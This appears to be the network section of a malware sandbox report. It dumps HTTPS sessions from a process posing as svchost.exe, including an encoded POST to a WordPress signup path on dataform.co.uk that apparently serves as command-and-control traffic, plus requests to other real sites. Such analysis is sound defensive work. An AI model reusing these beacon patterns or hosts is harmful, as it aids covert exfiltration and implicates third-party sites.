                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1661INData Raw: 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 20 68 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73
                                                                                                                                                                                                                                                                        Data Ascii: ,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js"> <div class="main-wrapper" role="main"> <div class="main-content"> <h1 class="zone-name-title h1"> <img clas
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1663INData Raw: 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 62 48 6c 7a 58 37 38 65 36 46 55 6d 52 39 51 53 5f 4d 58 41 52 39 6c 31 46 6a 6f 59 71 5f 43 75 6c 43 4c 63 59 77 55 61 31 68 6f 2d 31 36 37 38 34 33 31 33 38 35 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6d 64 22 20 76 61 6c 75 65 3d 22 62 64 52 4b 4e 77 47 50 44 79 67 35 2e 66 30 64 56 51 46 30 4a 47 4e 79 67 68 39 45 4e 61 53 6e 44 64 2e 67 52 50 58 74 76 43 67 2d 31 36 37 38 34 33 31 33 38 35 2d 30 2d 41 55
                                                                                                                                                                                                                                                                        Data Ascii: "/?__cf_chl_f_tk=bHlzX78e6FUmR9QS_MXAR9l1FjoYq_CulCLcYwUa1ho-1678431385-0-gaNycGzNCPs" method="POST" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="md" value="bdRKNwGPDyg5.f0dVQF0JGNygh9ENaSnDd.gRPXtvCg-1678431385-0-AU
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1664INData Raw: 39 74 6c 62 47 30 57 44 7a 4c 6d 6c 75 36 51 6c 4c 6f 38 4b 56 6a 76 58 58 73 64 55 78 45 76 50 76 44 63 30 31 76 53 35 33 70 46 68 34 44 45 42 59 6c 58 30 72 6c 77 4d 6f 67 62 35 6a 36 78 76 6e 6e 79 61 62 4c 39 63 46 43 39 56 4c 56 43 79 5a 6d 34 75 4b 48 70 34 39 4a 43 6c 6e 6b 48 61 6b 45 77 63 44 33 6e 47 39 4c 77 41 45 53 35 52 55 49 4e 4f 67 68 71 79 42 73 5a 4f 46 4c 34 43 35 51 45 72 54 79 4b 30 49 53 31 6b 77 79 4c 42 5f 55 7a 62 43 75 34 37 51 6a 74 41 4f 4f 78 76 78 76 4f 77 77 71 30 56 53 44 65 42 77 62 78 48 75 65 58 6e 42 48 31 64 51 4b 46 34 6a 32 47 4b 53 72 64 34 4d 75 43 4c 61 78 35 47 5f 62 61 6e 2d 5f 63 37 62 69 48 43 70 37 39 55 6a 6a 56 47 39 36 4b 64 5a 4d 41 30 33 51 41 36 65 77 71 57 69 52 61 32 52 67 64 73 50 6d 4b 63 6f 64 36
                                                                                                                                                                                                                                                                        Data Ascii: 9tlbG0WDzLmlu6QlLo8KVjvXXsdUxEvPvDc01vS53pFh4DEBYlX0rlwMogb5j6xvnnyabL9cFC9VLVCyZm4uKHp49JClnkHakEwcD3nG9LwAES5RUINOghqyBsZOFL4C5QErTyK0IS1kwyLB_UzbCu47QjtAOOxvxvOwwq0VSDeBwbxHueXnBH1dQKF4j2GKSrd4MuCLax5G_ban-_c7biHCp79UjjVG96KdZMA03QA6ewqWiRa2RgdsPmKcod6
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1665INData Raw: 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 38 37 36 62 63 38 39 61 39 32 30 65 36 35 33 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 62 48 6c 7a 58 37 38 65 36 46 55 6d 52 39 51 53 5f 4d 58 41 52 39 6c 31 46 6a 6f 59 71 5f 43 75 6c 43 4c 63 59 77 55 61 31 68 6f 2d 31 36 37 38 34 33 31 33 38 35 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 46 50 57 76 3a 20 27 67 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 54 69 6d 65 4d 73 3a 20 27 31 30 30 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4d 54 69 6d 65 4d 73 3a 20 27 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 70 6c 56 3a 20 34 2c 0a 20 20 20
                                                                                                                                                                                                                                                                        Data Ascii: ', cHash: '876bc89a920e653', cUPMDTk: "\/?__cf_chl_tk=bHlzX78e6FUmR9QS_MXAR9l1FjoYq_CulCLcYwUa1ho-1678431385-0-gaNycGzNCPs", cFPWv: 'g', cTTimeMs: '1000', cMTimeMs: '0', cTplV: 4,
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1667INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 70 6f 59 65 74 71 54 77 70 71 31 71 69 35 59 66 79 37 6b 39 78 67 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c 39 38 63 46 50 70 7a 30 44 6a 72 6d 45 33 6f 34 34 57 4d 64 5a 72 36 61 5a 51 52 73 51 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 68 3a 20 27 6a 57 32 78 52 42 73 71 57 31 76 4c 74 75 42 6f 6f 58 39 61 4b 6d 45 44 32 63 5a 68 41 4c 37 73 6b 44 59 49 30 4d 48 64 72 6c 6b 3d 27 2c 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                        Data Ascii: i2: 'poYetqTwpq1qi5Yfy7k9xg==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL98cFPpz0DjrmE3o44WMdZr6aZQRsQ=', hh: 'jW2xRBsqW1vLtuBooX9aKmED2cZhAL7skDYI0MHdrlk=',
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1668INData Raw: 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 0a 20 20 20 20 7d 28 29 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 20 72 6f 6c 65 3d 22 63 6f 6e 74 65 6e 74 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                                        Data Ascii: po.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('head')[0].appendChild(cpo); }());</script> <div class="footer" role="contentinfo"> <div clas
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1669INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        111192.168.2.66110883.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1669OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: dataform.co.uk
                                                                                                                                                                                                                                                                        Content-Length: 4336
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1669OUTData Raw: 73 31 52 66 5a 54 31 48 53 55 74 4f 55 46 4a 56 56 31 6c 62 58 6d 42 69 5a 47 63 30 4a 72 7a 55 49 42 78 53 36 64 34 61 31 73 6b 72 44 52 73 34 68 6d 47 70 33 56 6f 49 4a 65 69 58 6f 64 2b 74 72 37 77 75 2b 64 4d 6a 70 77 68 76 58 43 7a 6e 37 46 44 73 55 52 66 32 36 4e 6f 78 74 68 66 54 6f 6e 61 42 55 31 71 63 38 61 61 44 6b 31 50 4f 6f 72 41 6f 35 57 7a 41 4a 30 66 6a 56 70 63 41 52 72 38 44 45 74 4d 76 37 65 30 58 74 57 56 6b 4b 67 43 72 6c 45 76 71 6a 33 71 62 57 49 41 37 79 4c 34 65 76 64 39 6a 44 41 39 77 79 50 76 2b 6f 66 6a 48 68 4c 79 4c 69 30 57 54 58 32 44 38 4a 71 78 76 57 56 71 6d 58 75 36 55 5a 76 59 50 4c 44 57 32 4b 49 4d 47 70 39 63 4f 46 55 4c 78 65 2b 68 59 47 38 4a 5a 5a 4a 66 4f 41 66 74 61 4d 65 7a 6a 70 75 38 49 38 58 44 42 52 7a 4b
                                                                                                                                                                                                                                                                        Data Ascii: s1RfZT1HSUtOUFJVV1lbXmBiZGc0JrzUIBxS6d4a1skrDRs4hmGp3VoIJeiXod+tr7wu+dMjpwhvXCzn7FDsURf26NoxthfTonaBU1qc8aaDk1POorAo5WzAJ0fjVpcARr8DEtMv7e0XtWVkKgCrlEvqj3qbWIA7yL4evd9jDA9wyPv+ofjHhLyLi0WTX2D8JqxvWVqmXu6UZvYPLDW2KIMGp9cOFULxe+hYG8JZZJfOAftaMezjpu8I8XDBRzK
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1954INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                        Keep-Alive: timeout=2, max=98
                                                                                                                                                                                                                                                                        Content-Length: 48939
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                        X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:27 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1955INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1958INData Raw: 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 6e 2c 21 31 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 28 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 2e 72 65 61 64 79 53 74 61 74 65 26 26 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 29 29 2c 28 6e 3d 74 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63
                                                                                                                                                                                                                                                                        Data Ascii: eadyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).conc
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1966INData Raw: 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 31 34 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70 65
                                                                                                                                                                                                                                                                        Data Ascii: 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(14)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' repe
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1974INData Raw: 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 72 65 76 6f 6c 75 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 34 2e 38 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 63 5f 61 64 64 5f 74 6f 5f 63 61 72 74 5f 70 61 72 61 6d 73 3d 7b 22 61 6a 61 78 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61
                                                                                                                                                                                                                                                                        Data Ascii: ipt' src='https://dataform.co.uk/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8'></script><script type='text/javascript'>//<![CDATA[var wc_add_to_cart_params={"ajax_url":"https:\/\/dataform.co.uk\/wp-admin\/a
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1982INData Raw: 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b
                                                                                                                                                                                                                                                                        Data Ascii: ps://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="76x76" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="120x120" href="https://dataform.co.uk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2024INData Raw: 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 34 30 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 70 72 69 63 69 6e 67 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 50 72 69 63 69 6e 67 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74
                                                                                                                                                                                                                                                                        Data Ascii: menu-item-object-page menu-item-54040"><a href='https://dataform.co.uk/pricing/' data-level='1'><span class="menu-item-text"><span class="menu-text">Pricing</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-it
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2032INData Raw: 6f 72 6d 2d 37 5c 2f 76 31 22 7d 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 73 63 72 69 70 74 73 2e 6a 73 3f 76 65 72 3d 35 2e 31 2e 33 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 67 6f 5f 70 72 69 63 69 6e 67 2f
                                                                                                                                                                                                                                                                        Data Ascii: orm-7\/v1"}};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.3'></script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/go_pricing/


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        112192.168.2.66103991.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1673OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1674INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:57:02 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1674INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1690INData Raw: 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 20 20 2d 2d 0d 0a 32 30 30 30 0d 0a 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c
                                                                                                                                                                                                                                                                        Data Ascii: </div> </div> </article> </section> </section></div>... topnews. -->... content --2000><div id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ... aktual
